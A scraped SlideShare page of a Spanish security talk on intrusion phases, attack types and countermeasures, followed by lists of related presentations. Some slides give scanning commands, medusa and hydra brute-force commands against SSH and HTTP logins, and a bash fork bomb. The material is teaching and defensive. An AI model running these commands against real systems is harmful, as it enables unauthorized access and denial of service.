       y Contramedidas.

   Espero que les haya gustado


               Dudas? | Preguntas?
                 Se aburrieron?
   oscar.gonzalez@ianux.com.ar         gabriel.ramirez@ianux.com.ar
   oscar.gonzalez@saltalug.org.ar
Tecnicas de Intrusion (Backtrack)
       y Contramedidas.




        Muchas gracias!!!!

Más contenido relacionado

La actualidad más candente

1 categorias-ataques
1 categorias-ataques1 categorias-ataques
1 categorias-ataquesmvrodriguez
 
Introduccion seguridad informatica - chakan
Introduccion seguridad informatica   - chakanIntroduccion seguridad informatica   - chakan
Introduccion seguridad informatica - chakanch4k4n
 
Tipos de Pentest
Tipos de PentestTipos de Pentest
Tipos de PentestRafael Seg
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaKERNEL404
 
Penetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingPenetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingAlonso Caballero
 
Reporte de seguridad
Reporte de seguridadReporte de seguridad
Reporte de seguridadChariito Roc
 
3.1. Ataques conceptos técnicas
3.1. Ataques   conceptos técnicas3.1. Ataques   conceptos técnicas
3.1. Ataques conceptos técnicasDavid Narváez
 
Unidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativasUnidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativasvverdu
 
Modulo VI: Detección de intrusos
Modulo VI: Detección de intrusosModulo VI: Detección de intrusos
Modulo VI: Detección de intrusosJuan Manuel García
 
Practica unidad 6 gaby
Practica unidad 6 gabyPractica unidad 6 gaby
Practica unidad 6 gabylagos12
 
IDS (Intrusion Detection System)
IDS (Intrusion Detection System)IDS (Intrusion Detection System)
IDS (Intrusion Detection System)krush kr
 

La actualidad más candente (20)

Spectre y Meltdown; Que debemos saber
Spectre y Meltdown; Que debemos saberSpectre y Meltdown; Que debemos saber
Spectre y Meltdown; Que debemos saber
 
Caso práctico - Test de Intrusión
Caso práctico - Test de IntrusiónCaso práctico - Test de Intrusión
Caso práctico - Test de Intrusión
 
Etical hacking
Etical hackingEtical hacking
Etical hacking
 
1 categorias-ataques
1 categorias-ataques1 categorias-ataques
1 categorias-ataques
 
Introduccion seguridad informatica - chakan
Introduccion seguridad informatica   - chakanIntroduccion seguridad informatica   - chakan
Introduccion seguridad informatica - chakan
 
Tipos de Pentest
Tipos de PentestTipos de Pentest
Tipos de Pentest
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Penetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingPenetration Testing / Ethical Hacking
Penetration Testing / Ethical Hacking
 
Reporte de seguridad
Reporte de seguridadReporte de seguridad
Reporte de seguridad
 
Ataque a la red de datos, diapositivas
Ataque a la red de datos, diapositivasAtaque a la red de datos, diapositivas
Ataque a la red de datos, diapositivas
 
Ataques informaticos
Ataques informaticos Ataques informaticos
Ataques informaticos
 
3.1. Ataques conceptos técnicas
3.1. Ataques   conceptos técnicas3.1. Ataques   conceptos técnicas
3.1. Ataques conceptos técnicas
 
Expo hacking etico
Expo hacking eticoExpo hacking etico
Expo hacking etico
 
Unidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativasUnidad 6 Seguridad en redes corporativas
Unidad 6 Seguridad en redes corporativas
 
Seguridad Informática-Ataques a la web.
Seguridad Informática-Ataques a la  web.Seguridad Informática-Ataques a la  web.
Seguridad Informática-Ataques a la web.
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Modulo VI: Detección de intrusos
Modulo VI: Detección de intrusosModulo VI: Detección de intrusos
Modulo VI: Detección de intrusos
 
Practica unidad 6 gaby
Practica unidad 6 gabyPractica unidad 6 gaby
Practica unidad 6 gaby
 
Virus
VirusVirus
Virus
 
IDS (Intrusion Detection System)
IDS (Intrusion Detection System)IDS (Intrusion Detection System)
IDS (Intrusion Detection System)
 

Destacado

Ingenieros sociales
Ingenieros socialesIngenieros sociales
Ingenieros socialesAlbertoper
 
Examen de informatica parte2
Examen de informatica parte2Examen de informatica parte2
Examen de informatica parte2Carmen_07
 
Trommel screen product introduction - pk machinery
Trommel screen   product introduction - pk machineryTrommel screen   product introduction - pk machinery
Trommel screen product introduction - pk machinerySylvia Wang
 
Fuga de información - segu-info
Fuga de información - segu-infoFuga de información - segu-info
Fuga de información - segu-infoCristian Borghello
 
exámen de seguridad informatica
 exámen de seguridad informatica exámen de seguridad informatica
exámen de seguridad informaticacastillo123456
 
Temas i examen seguridad informatica 2014
Temas i examen seguridad informatica 2014Temas i examen seguridad informatica 2014
Temas i examen seguridad informatica 2014Dcharca
 
Certificaciones De Seguridad Informatica
Certificaciones De Seguridad InformaticaCertificaciones De Seguridad Informatica
Certificaciones De Seguridad InformaticaDat@center S.A
 
Examen Seguridad: Criptografía.
Examen Seguridad: Criptografía.Examen Seguridad: Criptografía.
Examen Seguridad: Criptografía.Amador Aparicio
 
Cuestionario de Redes Informáticas
Cuestionario de Redes InformáticasCuestionario de Redes Informáticas
Cuestionario de Redes InformáticasLaddy Mathita
 
Preguntas de transmision
Preguntas de transmisionPreguntas de transmision
Preguntas de transmisionMarlonDj
 
Programa Aldea Digital 2015
Programa Aldea Digital 2015Programa Aldea Digital 2015
Programa Aldea Digital 2015Medina Núñez
 
Examen de redes de computadores
Examen de redes de computadoresExamen de redes de computadores
Examen de redes de computadoresDanny Logroño
 
Preguntas guía de cara al examen de REDES
Preguntas guía de cara al examen de REDESPreguntas guía de cara al examen de REDES
Preguntas guía de cara al examen de REDESINÉS ARABIA DíAZ
 
Ejercicios de test - seguridad y auditoria
Ejercicios de test -  seguridad y auditoriaEjercicios de test -  seguridad y auditoria
Ejercicios de test - seguridad y auditoriaoposicionestic
 

Destacado (20)

Ingenieros sociales
Ingenieros socialesIngenieros sociales
Ingenieros sociales
 
Examen de informatica parte2
Examen de informatica parte2Examen de informatica parte2
Examen de informatica parte2
 
Trommel screen product introduction - pk machinery
Trommel screen   product introduction - pk machineryTrommel screen   product introduction - pk machinery
Trommel screen product introduction - pk machinery
 
Fuga de información - segu-info
Fuga de información - segu-infoFuga de información - segu-info
Fuga de información - segu-info
 
Sniffers
SniffersSniffers
Sniffers
 
Pruebas de Intrusión utilizando Open Source
Pruebas de Intrusión utilizando Open SourcePruebas de Intrusión utilizando Open Source
Pruebas de Intrusión utilizando Open Source
 
CISM online review course Spanish / Español (Intro)
CISM online review course Spanish / Español (Intro)CISM online review course Spanish / Español (Intro)
CISM online review course Spanish / Español (Intro)
 
exámen de seguridad informatica
 exámen de seguridad informatica exámen de seguridad informatica
exámen de seguridad informatica
 
Temas i examen seguridad informatica 2014
Temas i examen seguridad informatica 2014Temas i examen seguridad informatica 2014
Temas i examen seguridad informatica 2014
 
Certificaciones De Seguridad Informatica
Certificaciones De Seguridad InformaticaCertificaciones De Seguridad Informatica
Certificaciones De Seguridad Informatica
 
Examen Seguridad: Criptografía.
Examen Seguridad: Criptografía.Examen Seguridad: Criptografía.
Examen Seguridad: Criptografía.
 
Cuestionario de Redes Informáticas
Cuestionario de Redes InformáticasCuestionario de Redes Informáticas
Cuestionario de Redes Informáticas
 
Tecnicas hacker
Tecnicas hackerTecnicas hacker
Tecnicas hacker
 
Preguntas de transmision
Preguntas de transmisionPreguntas de transmision
Preguntas de transmision
 
Programa Aldea Digital 2015
Programa Aldea Digital 2015Programa Aldea Digital 2015
Programa Aldea Digital 2015
 
COBIT 5: La Gran Mentira (por fin, desvelada) (Spanish)
COBIT 5: La Gran Mentira (por fin, desvelada) (Spanish)COBIT 5: La Gran Mentira (por fin, desvelada) (Spanish)
COBIT 5: La Gran Mentira (por fin, desvelada) (Spanish)
 
CISA online review course Spanish / Español (Intro)
CISA online review course Spanish / Español (Intro)CISA online review course Spanish / Español (Intro)
CISA online review course Spanish / Español (Intro)
 
Examen de redes de computadores
Examen de redes de computadoresExamen de redes de computadores
Examen de redes de computadores
 
Preguntas guía de cara al examen de REDES
Preguntas guía de cara al examen de REDESPreguntas guía de cara al examen de REDES
Preguntas guía de cara al examen de REDES
 
Ejercicios de test - seguridad y auditoria
Ejercicios de test -  seguridad y auditoriaEjercicios de test -  seguridad y auditoria
Ejercicios de test - seguridad y auditoria
 

Similar a Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez

Fuga de informacion, Oscar Gonzalez - Gabriel Ramirez
Fuga de informacion, Oscar Gonzalez - Gabriel RamirezFuga de informacion, Oscar Gonzalez - Gabriel Ramirez
Fuga de informacion, Oscar Gonzalez - Gabriel RamirezOscar Gonzalez
 
Introducción a los ejercicios de Red Team
Introducción a los ejercicios de Red TeamIntroducción a los ejercicios de Red Team
Introducción a los ejercicios de Red TeamEduardo Arriols Nuñez
 
Seguridad En Base De Datos
Seguridad En Base De DatosSeguridad En Base De Datos
Seguridad En Base De DatosWilliam Suárez
 
Seguridad En Base De Datos
Seguridad En Base De DatosSeguridad En Base De Datos
Seguridad En Base De Datosguestb40a1b0
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticamesiefrank
 
Seguridad informática y de ti
Seguridad informática y de tiSeguridad informática y de ti
Seguridad informática y de tiMario Nizama
 
Unidad5 investigación seguridad
Unidad5 investigación seguridadUnidad5 investigación seguridad
Unidad5 investigación seguridadEduardo S. Garzón
 
Penetration testing
Penetration testingPenetration testing
Penetration testinggh02
 
Aplicaciones Difusas UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1
Aplicaciones Difusas  UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1Aplicaciones Difusas  UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1
Aplicaciones Difusas UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1Luis Fernando Aguas Bucheli
 
Clasificaciones de seguridad +validaciones y amenazas
Clasificaciones de seguridad +validaciones y amenazasClasificaciones de seguridad +validaciones y amenazas
Clasificaciones de seguridad +validaciones y amenazasMarco Lopez
 
Análisis forense de redes y bitácora. Forensia en redes.
Análisis forense de redes y bitácora. Forensia en redes.Análisis forense de redes y bitácora. Forensia en redes.
Análisis forense de redes y bitácora. Forensia en redes.Oscar Hdez
 
Sistemas operativos
Sistemas operativosSistemas operativos
Sistemas operativosNixonCali
 

Similar a Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez (20)

Fuga de informacion, Oscar Gonzalez - Gabriel Ramirez
Fuga de informacion, Oscar Gonzalez - Gabriel RamirezFuga de informacion, Oscar Gonzalez - Gabriel Ramirez
Fuga de informacion, Oscar Gonzalez - Gabriel Ramirez
 
Bajo Ataque 2.pptx
Bajo Ataque 2.pptxBajo Ataque 2.pptx
Bajo Ataque 2.pptx
 
Introducción a los ejercicios de Red Team
Introducción a los ejercicios de Red TeamIntroducción a los ejercicios de Red Team
Introducción a los ejercicios de Red Team
 
Seguridad En Base De Datos
Seguridad En Base De DatosSeguridad En Base De Datos
Seguridad En Base De Datos
 
Seguridad En Base De Datos
Seguridad En Base De DatosSeguridad En Base De Datos
Seguridad En Base De Datos
 
Iniciación al Ethical Hacking
Iniciación al Ethical HackingIniciación al Ethical Hacking
Iniciación al Ethical Hacking
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informática y de ti
Seguridad informática y de tiSeguridad informática y de ti
Seguridad informática y de ti
 
3.redes seguridad
3.redes seguridad3.redes seguridad
3.redes seguridad
 
Administración de la seguridad
Administración de la seguridadAdministración de la seguridad
Administración de la seguridad
 
Unidad5 investigación seguridad
Unidad5 investigación seguridadUnidad5 investigación seguridad
Unidad5 investigación seguridad
 
Capitulo 9
Capitulo 9Capitulo 9
Capitulo 9
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Aplicaciones Difusas UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1
Aplicaciones Difusas  UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1Aplicaciones Difusas  UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1
Aplicaciones Difusas UNIDAD 5: ÉTICA Y PRIVACIDAD: Parte 1
 
Clasificaciones de seguridad +validaciones y amenazas
Clasificaciones de seguridad +validaciones y amenazasClasificaciones de seguridad +validaciones y amenazas
Clasificaciones de seguridad +validaciones y amenazas
 
Análisis forense de redes y bitácora. Forensia en redes.
Análisis forense de redes y bitácora. Forensia en redes.Análisis forense de redes y bitácora. Forensia en redes.
Análisis forense de redes y bitácora. Forensia en redes.
 
Seguridad inf.
Seguridad inf.Seguridad inf.
Seguridad inf.
 
Técnicas y Herramientas para la Evaluación de Vulnerabilidades de Red
Técnicas y Herramientas para la Evaluación de Vulnerabilidades de RedTécnicas y Herramientas para la Evaluación de Vulnerabilidades de Red
Técnicas y Herramientas para la Evaluación de Vulnerabilidades de Red
 
Seguridad
SeguridadSeguridad
Seguridad
 
Sistemas operativos
Sistemas operativosSistemas operativos
Sistemas operativos
 

Último

Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíassuserf18419
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxLolaBunny11
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITMaricarmen Sánchez Ruiz
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveFagnerLisboa3
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfJulian Lamprea
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...silviayucra2
 

Último (10)

Trabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnologíaTrabajo Mas Completo De Excel en clase tecnología
Trabajo Mas Completo De Excel en clase tecnología
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 
Presentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptxPresentación guía sencilla en Microsoft Excel.pptx
Presentación guía sencilla en Microsoft Excel.pptx
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
EPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial UninoveEPA-pdf resultado da prova presencial Uninove
EPA-pdf resultado da prova presencial Uninove
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
Desarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdfDesarrollo Web Moderno con Svelte 2024.pdf
Desarrollo Web Moderno con Svelte 2024.pdf
 
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
POWER POINT YUCRAElabore una PRESENTACIÓN CORTA sobre el video película: La C...
 

Tecnicas de intrusion y contramedidas Oscar Gonzalez - Gabriel Ramirez

  • 1. Tecnicas de Intrusion (Backtrack) y Contramedidas.  IANUX Soluciones | Comunidad de Software Libre http://ianux.com.ar | http://saltalug.org.ar LPIC Oscar Gonzalez, Gabriel Ramirez, Consultor IT, Security Consultant Security Researcher, Instructor LPI Linux oscar.gonzalez@ianux.com.ar gabriel.ramirez@ianux.com.ar oscar.gonzalez@saltalug.org.ar
  • 2. Tecnicas de Intrusion (Backtrack) y Contramedidas. Agenda:  Seguridad Informatica  Tecnicas de Intrusion | Hacking  Tools | Backtrack  Contramedidas o Hardening.  Ejemplos
  • 3. Tecnicas de Intrusion (Backtrack) y Contramedidas.  Un ataque ocurre cuando una persona o un grupo de personas intenta acceder, modificar o dañar un sistema o entorno. Estos ataques generalmente intentan lograr algunos de estos objetivos: Atacar la privacidad Atacar la integridad Atacar la disponibilidad Atacar la autenticidad
  • 4. Tecnicas de Intrusion (Backtrack) y Contramedidas. Las personas que atacan sistemas se ven motivadas por diferentes razones: • Por diversión o desafío. • Por venganza. • Por terrorismo. • Rédito económico. • Ventaja competitiva. • Poder
  • 5. Tecnicas de Intrusion (Backtrack) y Contramedidas. Los problemas de inseguridad actuales no se encuentran favorecidos únicamente por usuarios maliciosos, sino que muchas veces se encuentran ayudados por malas implementaciones de las aplicaciones, desconocimiento, negligencia, etc. Hemos catalogado los principales factores que pueden generar problemas de seguridad en: • Falta de políticas y/o normativas • Uso incorrecto de las aplicaciones • Protocolos • Errores en los programas • Ambiente multilenguaje y • Errores de configuración multiproveedor • Passwords • Dispersión geográfica • Falta de supervisión y/o control. • Falta de actualización de software de base
  • 6. Tecnicas de Intrusion (Backtrack) y Contramedidas. Es importante conocer la forma en que proceden los intrusos para conocer la manera de detenerlos. En general los intrusos realizan las mismas actividades cuando desean ingresar o atacar a un sistema, por lo que podemos generalizar los pasos en: Investigación Penetración Persistencia Expansión Logro del objetivo
  • 7. Tecnicas de Intrusion (Backtrack) y Contramedidas. Siempre antes de realizar un ataque, los intrusos realizan un I estudio del objetivo. N V Generalmente consiste en obtener la siguiente información: E S T ● Información de la empresa objetivo. I G ● Información del dominio objetivo: conociendo el nombre de la empresa A se puede obtener su información de dominio a través de consultas tipo C WHOIS. I ● Información de los servidores: una vez que el intruso obtuvo el dominio, O puede realizar consultas NSLOOKUP para conocer cuáles son los N servidores que tiene la empresa.
  • 8. Tecnicas de Intrusion (Backtrack) y Contramedidas.  Identificación de la plataforma: uno de los principales datos que buscan de sus objetivos es la plataforma sobre la que trabajan I (Windows, Linux, Novell, etc.). Esto se puede realizar mediante la N utilización de técnicas de OS fingerprint | Banner Identification. V E  Identificación de los servicios: otra información importante que buscan S obtener los atacantes son los servicios que ofrecen los servidores T objetivos. Esto se puede realizar mediante escaneadores de puertos I (port-scanners) G A Contramedidas: C Como primer contramedida, es necesario restringir la información que se I difundirá a través de los servicios de DNS y WHOIS. O También se puede incluir filtrado de paquetes, para evitar la detección de la N plataforma y los servicios y un Sistema de Detección de Intrusos (IDS) para detectar cuando se está produciendo un escaneo de puertos.
  • 9. Tecnicas de Intrusion (Backtrack) y Contramedidas. Banner Identification. telnet 192.168.1.1 22 nc -v -n 192.168.27.1 22 I wine sl.exe -v -b 192.168.27.1 N xprobe2 192.168.27.1 V amap -B 192.168.27.1 80 E ingenieria_social -XD S T Target Enumeration I nmap -sS -p 139 -O -D 24.213.28.234 192.168.27.1 G Identificación de registros / dominios A Sam Spade http://www.samspade.org/ C Identificación del Sistema Operativo Netcraft http://news.netcraft.com/ I GFI LANguard N.S.S O AutoScan (backtrack) N Scanrand scanrand -b10M -N 192.168.27.1:80,25,22,443 rotex http://www.robtex.com/ maltego
  • 10. Tecnicas de Intrusion (Backtrack) y Contramedidas. P E En esta situación el atacante intentará acceder al objetivo. N Para realizar este paso, utilizan diferentes técnicas: E T R  Explotación de vulnerabilidades: existe algún producto instalado que A permita la ejecución de código arbitrario. C  Debilidad de contraseñas: una contraseña débil puede permitir el I ingreso de intrusos. O N  Servicios mal configurados: un servicio que no esté adecuadamente configurado puede permitir que intrusos hagan uso abusivo del mismo, o incluso, que ejecuten código arbitrario.
  • 11. Tecnicas de Intrusion (Backtrack) y Contramedidas. P E Contramedidas: N E  Explotación de vulnerabilidades: actualización constante del software T instalado. R A  Debilidad de contraseñas: definir una política de contraseñas robusta. C  Servicios mal configurados: revisar periódicamente la configuración de I los servicios. O N Como contra-medida general, siempre tenemos que tener en cuenta al filtrado de paquetes y la revisión periódica de los archivos de logs para conocer los eventos que han sucedido en el sistema.
  • 12. Tecnicas de Intrusion (Backtrack) y Contramedidas. Una vez que un atacante ha logrado ingresar a un sistema, generalmente realiza actividades para evitar ser detectado y deja herramientas o puertas traseras en el sistema para poder P mantener un acceso permanente. E Para evitar ser detectado, en general un atacante busca los N archivos de auditoría o log del sistema, para borrarlos o E modificarlos ocultando su acceso y sus actividades. En T Windows NT/2000, se puede realizar borrando el contenido R del Visor de Sucesos :(. A C I Contramedidas: Para evitar que un intruso elimine los archivos de log, se puede optar por O mantenerlos guardados fuera del lugar donde se generan. N Es complicado evitar la copia de archivos, pero puede detectarse la modificación de ellos. Existen herramientas que crean un hash de los archivos de sistema, y avisan al administrador en caso de detectar una modificación.
  • 13. Tecnicas de Intrusion (Backtrack) y Contramedidas. Muchas veces, el objetivo final de un ataque no es E X el primer sistema atacado, sino que se utilizan P varios saltos intermedios para lograr realizar un A ataque sin ser rastreados. N S I Esto puede generar que nuestro sistema sea O víctima y a la vez sea atacante. N Nuevamente, las contramedidas son el filtrado de paquetes, los sistemas IDS, y el control periódico de los archivos de log.
  • 14. Tecnicas de Intrusion (Backtrack) y Contramedidas. L O G En este punto podríamos decir que la tarea del R intruso ha llegado a su objetivo. A partir de aquí, O podemos esperar diferentes acciones por parte del intruso: D E L Desaparecer sin dejar rastro Avisar al administrador que se ha ingresado al O sistema B J Comentar los fallos de seguridad encontrados a sus E colegas T Hacer públicos los fallos de seguridad I V O
  • 15. Tecnicas de Intrusion (Backtrack) y Contramedidas. Como vimos anteriormente, la seguridad debe proveer: 1) integridad, 2) disponibilidad y 3) confidencialidad de la información. Un ataque puede tener diferentes efectos:
  • 16. Tecnicas de Intrusion (Backtrack) y Contramedidas. Nos referimos a INTERCEPTACION cuando un usuario no autorizado obtiene acceso a la información. Ataques de interceptación: Eavesdropping (Sniffing| AIRSniffing | War Driving y Netstumbling | Desbordamiento de CAM | VLAN hopping | STP manipulation)
  • 17. Tecnicas de Intrusion (Backtrack) y Contramedidas. En un ataque por MODIFICACION, un usuario malicioso generalmente obtiene acceso no autorizado a un recurso con los privilegios necesarios para cambiarlo. Modificar un flujo de datos en una transmisión de red o archivos en un servidor pueden ser ejemplos de estos ataques. Ataques de modificación: Man-in-the-Middle (DHCP Starvation| Manipulación de datos
  • 18. Tecnicas de Intrusion (Backtrack) y Contramedidas. La INTERRUPCION consiste en dañar o dejar sin funcionamiento un sistema completo o parte de éste. Si bien la detección es inmediata, los daños ocasionados por la suspensión del servicio y el tiempo de recuperación pueden ser muy importantes. Ataques de interrupción: Denegación de Servicio Denegación de Servicio Distribuida Falla de dispositivos o Software. (bombas logicas :(){ :|:& };:) Desastres Naturales (incendios, inundaciones, catástrofes naturales, etc) Daños intencionales o no, ( ya sea por negligencia, descuido o ignorancia).
  • 19. Tecnicas de Intrusion (Backtrack) y Contramedidas. La FALSIFICACION puede aplicarse a la creación de nuevos objetos dentro del sistema, o simplemente participar en una conversación simulando ser otro interlocutor. Ataques de falsificación: IP Spoofing MAC Address Spoofing
  • 20. Tecnicas de Intrusion (Backtrack) y Contramedidas. El RECONOCIMIENTO es el descubrimiento no autorizado de la topología de la red, sus sistemas, servicios o vulnerabilidades. Para realizar cada paso del reconocimiento de una red, existen numerosas herramientas o alternativas. Algunas herramientas ya integran toda la secuencia de pasos: detectan los hosts alcanzables en una red, y por cada uno de estos realizan una búsqueda de sus servicios y vulnerabilidades. Una alternativa para evitar el descubrimiento es establecer filtros de tráfico. El filtrado de tráfico puede actuar como una barrera que impida los paquetes ICMP echo (generalmente utilizados en la primer fase del descubrimiento).
  • 21. Tecnicas de Intrusion (Backtrack) y Contramedidas. La FALSIFICACION puede aplicarse a la creación de nuevos objetos dentro del sistema, o simplemente participar en una conversación simulando ser otro interlocutor. Ataques de falsificación: IP Spoofing MAC Address Spoofing
  • 22. Tecnicas de Intrusion (Backtrack) y Contramedidas. El RECONOCIMIENTO es el descubrimiento no autorizado de la topología de la red, sus sistemas, servicios o vulnerabilidades. Para realizar cada paso del reconocimiento de una red, existen numerosas herramientas o alternativas. Algunas herramientas ya integran toda la secuencia de pasos: detectan los hosts alcanzables en una red, y por cada uno de estos realizan una búsqueda de sus servicios y vulnerabilidades. Una alternativa para evitar el descubrimiento es establecer filtros de tráfico. El fltrado de tráfico puede actuar como una barrera que impida los paquetes ICMP echo (generalmente utilizados en la primer fase del descubrimiento).
  • 23. Tecnicas de Intrusion (Backtrack) y Contramedidas. Código Malicioso / Virus  Se define como todo programa o fragmento del mismo que genera algún tipo de problema en el sistema en el cual se ejecuta, interfiriendo de esta forma con el normal funcionamiento del mismo. Existen diferentes tipos de código malicioso:  Bombas lógicas: Se encuentran diseñados para activarse ante la ocurrencia de un evento definido en su lógica.  Troyanos: Suele propagarse como parte de programas de uso común y se activan cuando los mismos se ejecutan.  Gusanos: Tienen el poder de autoduplicarse causando efectos diversos.  Cookies: Son archivos de texto con información acerca de la navegación efectuada por el usuario en Internet e información confidencial del mismo que pueden ser obtenidos por atacantes.  Keyloggers: Es una aplicación destinada a registrar todas las teclas que un usuario tipea en su computadora; algunos de ellos además registran otro tipo de información útil para un atacante, como ser, imágenes de pantalla.  Spyware: Aplicaciones que recogen y envían información sobre las páginas web que más frecuentemente visita un usuario, tiempo de conexión, datos relativos al equipo en el que se encuentran instalados (sistema operativo, tipo de procesador, memoria, etc.) e, incluso, hay algunos diseñados para informar de si el software que utiliza el equipo es original o no.
  • 24. Tecnicas de Intrusion (Backtrack) y Contramedidas. Resumen 1: Introducción 2: Footprinting e Ingeniería Social 3: Escaneo y Enumeración 4: SystemHacking 5: Malware (Troyanos, Backdoors, Virus & Gusanos) 6: Sniffers (MITM..) 7: Denegación de Servicio y Hijacking de Sesión 8: Web Hacking 9: Wireless Hacking 10:Craking 11: Seguridad Física
  • 25. Tecnicas de Intrusion (Backtrack) y Contramedidas. Que herramientas necesitamos? Backtrack | Samurai | WifiSlax Cabezota | Paciencia | Estudiar | Leer
  • 26. Tecnicas de Intrusion (Backtrack) y Contramedidas. Tools nmap | meduza | hydra | tsgrinder | Pwdump| john | ettercap | sslstrip | metasploit | UCSniff| Nessus | Telnet Evilgrade| Fasttrack| Paros|BeEF|DSniff|Samurai|WifiSlax|SQLNinja| Xssploit|WebShag|aircrack-ng|kismet|kismac|La Cabeza|..
  • 27. Tecnicas de Intrusion (Backtrack) y Contramedidas. Bruteforce Tool: Meduza | hydra | TSGrinder medusa -h 192.168.198.133 -u root -P password -M ssh hydra -l admin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -t 15 -f -s -vV 192.168.1.1 http-get / medusa: -h: Dirección IP objetivo (host) -u: Usuario (en este caso root) -P: Archivo contenedor de contraseñas (puede asignarse la ruta completa de ubicación de este archivo, ej. /root/Desktop/carpeta/passwords.txt) -M: Módulo de ejecución de medusa, para este caso ssh (Secure Shell)
  • 28. Tecnicas de Intrusion (Backtrack) y Contramedidas. Sin SSL ¿Y Ahora Quien Podrá Defendernos? Mini Taller 1: Asegurar utilizando SSL o cifrado a nuestras comunicaciones no siempre es la mejor opción.
  • 29. Tecnicas de Intrusion (Backtrack) y Contramedidas. Que es ettercap? Que es ARP? Que es MITM? Que es SSLStrip? Que es un Fake SSL Attack? Que es un Null Prefix Attack SSL? Como funciona, todo esto? Algunos consejos para defendernos
  • 30. Tecnicas de Intrusion (Backtrack) y Contramedidas. Que es ettetcap? es un interceptor/sniffer/registrador para LANs con switch. Soporta direcciones activas y pasivas de varios protocolos (incluso aquellos cifrados, como SSH y HTTPS). También hace posible la inyección de datos en una conexión establecida y filtrado al vuelo aun manteniendo la conexión sincronizada gracias a su poder para establecer un Ataque Man-in-the-middle(Spoofing). Muchos modos de sniffing fueron implementados para darnos un conjunto de herramientas poderoso y completo de sniffing. Que es el ARP? El protocolo ARP es un protocolo de capa 3 utilizado para traducir direcciones IP (por ejemplo: 192.168.1.1) a direcciones físicas de tarjeta de red , direcciones MAC (por ejemplo: 0fe1.2ab6.2398).
